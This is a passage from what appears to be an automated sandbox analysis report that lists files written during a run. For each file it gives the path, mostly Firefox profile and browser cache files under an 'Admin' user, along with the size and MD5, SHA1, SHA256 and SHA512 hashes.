SHA184f98b56d49f01e9b6b76a4e21accf64fd319140
SHA256522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9
SHA51260348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac
-
Filesize
71KB
MD583142242e97b8953c386f988aa694e4a
SHA1833ed12fc15b356136dcdd27c61a50f59c5c7d50
SHA256d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755
SHA512bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\7BCOPU31\service[1].htm
Filesize1B
MD5cfcd208495d565ef66e7dff9f98764da
SHA1b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA2565feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA51231bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bhzluvd5.default-release\activity-stream.discovery_stream.json.tmp
Filesize26KB
MD52d2591330407464b4ad629df2e7c96e4
SHA1f5665cd2f873601d55f6580754f45ebe33db17a2
SHA25615f590788289b2d31bfd30461662c9026db6dcd0d32898dfce844b2826a66e49
SHA512349de38adda8d7876cf0fe81bd64acf3cef36cf0bd0c8b39c8d181ce1498789a5fb5b9398919124dbc8581025cf651ed76c1e571e82bc4d6842a56a14b4b3be9
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bhzluvd5.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl
Filesize15KB
MD596c542dec016d9ec1ecc4dddfcbaac66
SHA16199f7648bb744efa58acf7b96fee85d938389e4
SHA2567f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798
SHA512cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658
-
Filesize
3.8MB
MD5f7605fc9a28d7dec2cbee884066a34f4
SHA1074f8f0da6eb355d4a61e65a74cbb490b4f7c1bc
SHA256634496a27b42f3a1735986573b1376a36535d7081bf761de51e537b2ae8686ae
SHA512bc3b573e7856a70e5a2adc0ff2766756d5c3519263b0b520267cbcbe8472743cdf053738a00ad0457e2dfe90f83fd865e6cba997b5fa2ded2080e6f2c4936c37
-
Filesize
445KB
MD5c83ea72877981be2d651f27b0b56efec
SHA18d79c3cd3d04165b5cd5c43d6f628359940709a7
SHA25613783c2615668fba4a503cbefdc18f8bc3d10d311d8dfe12f8f89868ed520482
SHA512d212c563fdce1092d6d29e03928f142807c465ecaaead4fe9d8949b6f36184b8d067a830361559d59fc00d3bbe88feda03d67b549d54f0ec268e9e75698c1dd0
-
Filesize
4.5MB
MD596dd38daadfd80cf699a8c087b581ab9
SHA1ccea87fbad5d9fdea11ecedfd7f3d0b2d2ff3b2c
SHA256ad659d3cd67b4c566ada6bc6dfbeece67e5b1941585fbc480bdd80daf290a110
SHA5129862debc204be49700c1025ab9556a2b082890fae9e43ec9b7c7d41ed1db801601e48b51c755679b4035a4af7019b159451bc356769bd432b1173c15a10423ab
-
Filesize
1.8MB
MD5f155a51c9042254e5e3d7734cd1c3ab0
SHA19d6da9f8155b47bdba186be81fb5e9f3fae00ccf
SHA256560c7869df511c5ea54f20be704bbda02e1623d0867333a90ac3783d29eae7af
SHA51267ec5546d96e83a3c6f4197a50812f585b96b4f34a2b8d77503b51cddd4ea5a65d5416c3efc427a5e58119fa068125987e336efb2dfd5811fe59145aa5f5bd6a
-
Filesize
3.0MB
MD5020e8f9ff53e518edb025a6f9e90a525
SHA1afc1880f143c9eea39247954aba538ff7d2367bb
SHA2565ad7dec6dace67e0f54adf896f2e846ede39239d9640ab932d1673e0c0415c1d
SHA5121cb0c9f4f96f0a13261b289e7999d207aea95039e3562a9bddacc7222f2d0f933d63dfb7b49f45ba4a075cf31033d27af58b28a8cd9724eaacfe2dc6ca7b131d
-
Filesize
3.1MB
MD5fb8a11382106b0ef3454fc1aa5a86c50
SHA1f41d205674642f6a335ba9e90d620d20eb2eaf7c
SHA256086f8bc32eddaa4e947338c087f677b1a78da8f7fc4604d0d0519c093e38f7f4
SHA5126190e5830f82fdf19bef61a918b4123f1fa45828a7937e682fc80892d3771eef56a4989185261d9b59af72d4edb08e3b15313170dca1baf6e5cc2e643e0e2bb4
-
Filesize
1.8MB
MD50824d5f9638e1fed7aea21a97f70f38c
SHA183aead23fff28d92a28748702d8329818483c6bc
SHA2566f2daaadec4daf489f7a5f923ecf0ef5b7a0af365d4af7e36040904f68545a90
SHA512c86e43dac2b620c3d3465c0e9a9c78e72293881cf44b2e5c161c4d6d2ffe601e275bbc651e4a02e1f71f4bd2dc7df0e54248a7f2dc7756696cd42099186953aa
-
Filesize
947KB
MD528f3e4c645b836fe6b7893752b37edcb
SHA1af8e67a82648f1cb435ca22d26656fcad6bec9d6
SHA25694757246933bf308c399fc5a46cb74a9203f5940de0c1724cdc9a01ac32d7aef
SHA512d00eb74351597901d3feccedf26de34221ef6c08b5aa40b3f2d1669ef90ec0fa2ee935fad71fade353d5e889c21c7ef2bb270793ed19a2dd80ceae87f65181f8
-
Filesize
1.7MB
MD5b9ec326f2c59b318c0a4ead48270846f
SHA18da0767e75879e574bcb3dc1eccde1b4abd5beef
SHA2563f95a0648e4744771d61482b075cedb4d60694226cacddc5882e651acd8c42cd
SHA5129cc550f7f8bd20bdc8543fca2773faa13defcde86ea09bf5111be60b1b65f085946162d49d8ed992db33d40c649832890397ca83e60ff1f7f2a1d2f54822f77e
-
Filesize
2.0MB
MD56006ae409307acc35ca6d0926b0f8685
SHA1abd6c5a44730270ae9f2fce698c0f5d2594eac2f
SHA256a5fa1579a8c1a1d4e89221619d037b6f8275f34546ed44a020f5dfcee3710f0b
SHA512b2c47b02c972f63915e2e45bb83814c7706b392f55ad6144edb354c7ee309768a38528af7fa7aeadb5b05638c0fd55faa734212d3a657cd08b7500838135e718
-
Filesize
5.0MB
MD5ddab071e77da2ca4467af043578d080c
SHA1226518a5064c147323482ac8db8479efd4c074f8
SHA256d3271bc7c315bd03e070cc2048c0349a73ecd858df500f2a2e2f09d606dfe79c
SHA512e3dc210bef348b324c9a00e32648b50a6cd0f078eefa436b201afd10853b648654de3fd993a1cea9d1aa4e7dde6587de1c1f8c09e09af7c62dde8536fd43d6d8
-
Filesize
415KB
MD5641525fe17d5e9d483988eff400ad129
SHA18104fa08cfcc9066df3d16bfa1ebe119668c9097
SHA2567a87b801af709e8e510140f0f9523057793e7883ec2b6a4eab90fcf0ec20fd4a
SHA512ee92bc34e21bb68aeda20b237e8b8e27f95e4cc44f5fd9743b52079c40f193cc342f8bb2690fd7ab3624e1690979118bd2e00a46bda3052cbd76bc379b87407e
-
Filesize
183KB
MD5109cab5505f5e065b63d01361467a83b
SHA14ed78955b9272a9ed689b51bf2bf4a86a25e53fc
SHA256ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673
SHA512753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc
-
Filesize
717B
MD54a0ec4652b8da99eea505e8f4f845cc4
SHA1f4835f3e8d01308ff8e8ed7a0e8d50debb6acc94
SHA256757ceda3fc363c7c1f2afd953c2a978bc6582b6b8c72cecb9b1b067387015817
SHA512652773e25aca36f65518b2f75ec5aab9a86bfb4532c20d27f75f96b852d9a0e35d10327da270d9e8142972d77a2deb7b2fcf59f3ea04d5f094949348e24ac8a0
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhzluvd5.default-release\datareporting\glean\db\data.safe.bin
Filesize2KB
MD5df5d7014f2c1e7a1f0b132cc3ddf7929
SHA1e80ab420f3cad958c98add5c7791714f3411893e
SHA256e550a0c4f7fe158945e9ffecf8dfe79752449ec2246793f86e87b0c89e7d340f
SHA5120d2fd93fed9a673e4977b0e51c7192b57e7df6c68e04f1d66166dfaef4ba3c4dc28b177b8fef7e2c9b13e45ae1c02fcc23e93cbd4c21d635a6db238100593dbe
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhzluvd5.default-release\datareporting\glean\pending_pings\c5eb53f9-952a-46b5-9740-26d2b0af7965
Filesize745B
MD58da9ff4bcd6aabe06d68b444b9e3e5b0
SHA1b6b2b7c22e193947fd8c66b1d6399188ee6a60fb
SHA256038923654c2379bfbeb02e573b033627099dd8ff77c7ac037af8cae1c67d6863
SHA512f225fc8f7b5eb3f6c4d5346c2f89419a5ffa2c2b99e9de25cceae13093b6bb9bd634cda2a057af6aa811b18edbf5b2f1b22abd655c7149cd036069d57c8317ec
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhzluvd5.default-release\datareporting\glean\pending_pings\f44ed2d6-c85e-4e84-be4e-f7d669e23eda
Filesize11KB
MD5da65abdff34860f123893461b0febe81
SHA1559e0e283913734f063f7af4b51de02a7a19e80a
SHA256aef338c89a352b126710c4e957fce1d6ac6e9bec58c39e66a93b0e7fc1e435c3
SHA5127fbbc2ced735d0bd7fd9c0d38e6e737ec33bf62b59e029c82f8eb7c5277ecae1b59cd5bf7269e7da7d86d4d128be504ed531560fc1588a10f3b0a81af0aaae1a
-
Filesize
6KB
MD5faa5c68cc918dba4d8aa74bd2de4b629
SHA10fad76a7a789dba6f13690e1a9a23a67a414d6c3
SHA2564d864822aece0916b5a706fd329f817289a8238ff455bf766645e82f34134146
SHA512b1cd5a401f83677f7868dc072fd14fb54fff2c9337aee716792236ab230114c042d7d8d29c938e117331dd2449761c552f73201b5e8291bb810849f3bf1b6a71
-
Filesize
6KB
MD550105951f48aff0f995ff5f33423a8cb
SHA133113721bbe60d3984704fb2390381552b1b1b8d
SHA256fe22102212f276e2e19bafba591c3040ea03dafdc7deac31e6323fb06c909903
SHA512882335c7ed675abfd0672a6f71dafd889e1bff78818aa018ead3eedbdde420e88737d9f210e4ade0c87ae1b029e3ddc99c391f421c74ef6318be58bab881044b
-
Filesize
6KB
MD50cbc790ed73d9e13b711d1a79ae37b4c
SHA1bba9a04107fc937366f5aa8d4110c1a33db9eeca
SHA25636235001babb14fb023c89983ac53d8936c2ccbfb58b6e05bb39e1d691e0ca6b
SHA51288c5bf83e4afca6e90bd103e728698c49824cd50f4f5ae60ddd596891b49f95bee68abdb8a02aee97851018b10417dd27c1b9d1e9d0633551ce79f9db715b192
-
Filesize
6KB
MD5fe442ba615ebfa17675db78f24864176
SHA1d360b246be8d0f119ec13e3004ce70e05a0b33fe
SHA256b191541e1202e46ece2627641927b88e0341aa00f828b2bea447ae1d5ad137bf
SHA51219afc1fc44138e05ddd422d18d4445f00cba27173c51b1b6b73643a7a587c6c2ae814c0bddf904c99727bc44b55d67e8d3aa80ac5be2a89290504316efb28cb5
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhzluvd5.default-release\sessionstore-backups\recovery.jsonlz4
Filesize4KB
MD5164180c43a1bd16e79f4d7b1caefed0a
SHA1568aba3487c839c01f0539271c2f5d63a285dc4a
SHA256a3199bc49201457c495311ed8168789a5935e3ffc34cd86151455e72b3f4a732
SHA5127d8521a1bc715c91437189d85991d55c54c1be66dd61a7ca63e7aad37ef8f636791dd7e211a6730aa8a088ec46807d097c5e575b8b0b9369462a1fe02b3d219a
-
Filesize
1KB
MD5acabe8a84d73f940e5fda6321ef5dd38
SHA1b6e5e6c0effe1d96ea503a736da4c107252c4c3f
SHA2569e2c8c2e016ffe6da7da1c1eeb12cadf5333bdf05e6faf492083a37b704bb1f6
SHA5122abef27d4726bda84f77fb56491324e6bba7424ff4c1d7754649e7e2c66c08262e0d95837b4d91da3e4524111bf434968a87e8b6577c2612fc998784c2b91cad
-
Filesize
1.8MB
MD5895d364d98674fc39c6c2ca1607c189c
SHA1089147d7501025cfc4f8b84305dfd211c8708be4
SHA25643374f0238ae8b778ff340a81a654269894b69815eae179af6634bcf08c96301
SHA51256a3e90dc994f061431c5173021cc234cacb37e3cdb1df5f073c92d90fff7495385277da29abf839b77b4cbcf36ca318a2a83f6fbfd484670527e97f45be4d9d
-
Filesize
987KB
MD5f49d1aaae28b92052e997480c504aa3b
SHA1a422f6403847405cee6068f3394bb151d8591fb5
SHA25681e31780a5f2078284b011c720261797eb8dd85e1b95a657dbce7ac31e9df1f0
SHA51241f715eea031fd8d7d3a22d88e0199277db2f86be73f830819288c0f0665e81a314be6d356fdc66069cb3f2abf0dd02aaa49ac3732f3f44a533fcec0dfd6f773